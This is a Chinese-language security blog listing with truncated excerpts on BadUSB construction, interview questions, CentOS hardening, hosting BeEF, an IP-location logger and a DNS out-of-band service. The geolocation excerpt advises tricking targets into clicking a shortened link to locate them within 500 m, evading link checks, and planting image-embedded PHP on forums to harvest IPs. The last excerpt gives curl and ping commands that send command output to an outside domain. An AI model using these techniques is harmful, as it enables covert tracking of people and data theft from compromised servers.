[硬件]使用Teensy2.0++ 制作BadUSB渗透,插谁谁怀孕

0x01:环境及所需 在linux环境下实现的,windows下如何实现,应该差不多,只要装上所需的东西即可. 1.首先安装arduino开发工具,及arduino IDE,下载地址.https://pan.baidu.com/s/1mhL2TAS 在linux系统下,下载后直接解压这个文件到/opt/目录   2.下载 49-teensy.rules文件,该文件用于teensy插件以什么角色运行. 下载地址:https://pan.baidu.com/s/1hsI31cC 下载后,执行命令: sudo cp 49-teensy.rules /etc/udev/rules.d/   3.下载TeensyduinoInstall.linux64文件,这个相当于teensy在arduino的插件,有了它,你打开arduino的时候,可以看到teensy选项 下载地址:htt […]

查看全部


互联网安全面试题汇总

Domain 解释一下同源策略 同源策略,那些东西是同源可以获取到的 如果子域名和顶级域名不同源,在哪里可以设置叫他们同源 如何设置可以跨域请求数据?jsonp是做什么的? Ajax Ajax是否遵循同源策略? json注入如何利用 浏览器策略 不同浏览器之间,安全策略有哪些不同,比如chrome,firefox,IE CSP是什么?如何设置CSP? SQLi 如何判断sql注入,有哪些方法 为什么有的时候没有错误回显,用php举例 宽字符注入的原理?如何利用宽字符注入漏洞,payload如何构造? 你都了解哪些sql 的bypass技巧 CRLF注入的原理 XSS xss的发生场景? 如果给你一个XSS漏洞,你还需要哪些条件可以构造一个蠕虫? 在社交类的网站中,哪些地方可能会出现蠕虫? 如果叫你来防御蠕虫,你有哪些方法? 如果给你一个XSS盲打漏洞,但是返回来的信息显示,他的后台是在内网 […]

查看全部


Centos安全配置(常见案例)

一、系统安全记录文件 #more  /var/log/secure 统计访问IP及次数。 #grep  -oP ‘(\d+\.){3}\d+’ /var/log/secure |sort |uniq -c 二、启动和登录安全性 1.用户口令 修改改密码长度/etc/login.defs #vi  /etc/login.defs PASS_MIN_LEN 8 2.注释掉不需要的用户和用户组 vi  /etc/passwd vi  /etc/group 3.口令文件 chattr命令给下面的文件加上不可更改属性,从而防止非授权用户获得权限。 #chattr +i /etc/passwd #chattr +i /etc/shadow #chattr +i /etc/group #chattr +i /etc/gshadow 4.禁止CtrlAltDelete重新启动机器命 […]

查看全部


在OPENSHIFT上安装BeEF

0x01:问题总结 (不喜欢看的可以pass,这个经验也适用于以后在openshift上部署其他脚本应用) 经历两天各种问题处理,终于搞定,主要问题出在OPENSHIFT免费的VPS上,没有root权限,而且各种权限被限制,使用screen 离线后台执行任务都无法让脚本一直在处于运行状态,守护进程也无法按常理使用,最终导致BeEF启动后五到十分钟自动清理会话,自动终止了BeEF进程,导致脚本类程序无法一直处于运行状态,下面该方法也适用于其他脚本程序。 使用openshift自身的命令加参数对运行的脚本程序进行进程守护 命令如下: nohup $OPENSHIFT_REPO_DIR/public/beef $OPENSHIFT_RUBY_IP $OPENSHIFT_REPO_DIR/public |& /usr/bin/logshifter -tag ruby & 命令说明: […]

查看全部


通过IP定位目标(可定位到五百米范围内)

平台地址Url: http://ip.jozxing.cc 访问后,IP会被记录。 通过在 http://ip.jozxing.cc/ips.php页面查看详细地址,查看完后请及时清空。 也可以自定义查询ip地址:http://ip.jozxing.cc/ip.php?ip=xxx.xxx.xxx.xxx 该功能主要根据目标IP定位详细地址,正常情况下,国内IP准确定位距离在五百米范围内。 (想知道对方地址,那就欺骗他点击此链接,建议找个生成短地址网站生成个短地址,那样能绕过各种绿标检测。) 由于之前想通过隐写php代码到jpg图片中,然后添加jpg后缀到apache配置文件里,让apache能够解析 jpg图片中的php代码,这样就能够把获取ip的地址(例如:ip.jozxing.cc/ip.jpg)传播到“支持url链接图片插入”的论坛里,那样妥妥能获取大量ip,并存入mongodb中 […]

查看全部


利用云眼进行无回显渗透测试姿势

云眼Url:  http://eye.jozxing.cc 主要功能,用来处理在渗透测试过程中,找到了服务器命令执行漏洞,但是无法回显结果或者检验执行是否成功,于是乎云眼出现了,利用服务器请求域名时需要查询DNS的过程,来获取结果。至于环境搭建,需要两个域名一个公网服务器,A域名做NS服务器,B域名用来获取DNS记录查看,且B域名的DNS设置为A域名(即NS)。云眼可用于 *nix,多种数据库,windows,具体利用方式如下, 1. *nix: curl http://eye.0x80.cc/`whoami` ping `whoami`.eye.0x80.cc     2. windows ping %USERNAME%.b182oj.ceye.io 0x01 SQL Injection From http://docs.hackinglab.cn/HawkEye-L […]

查看全部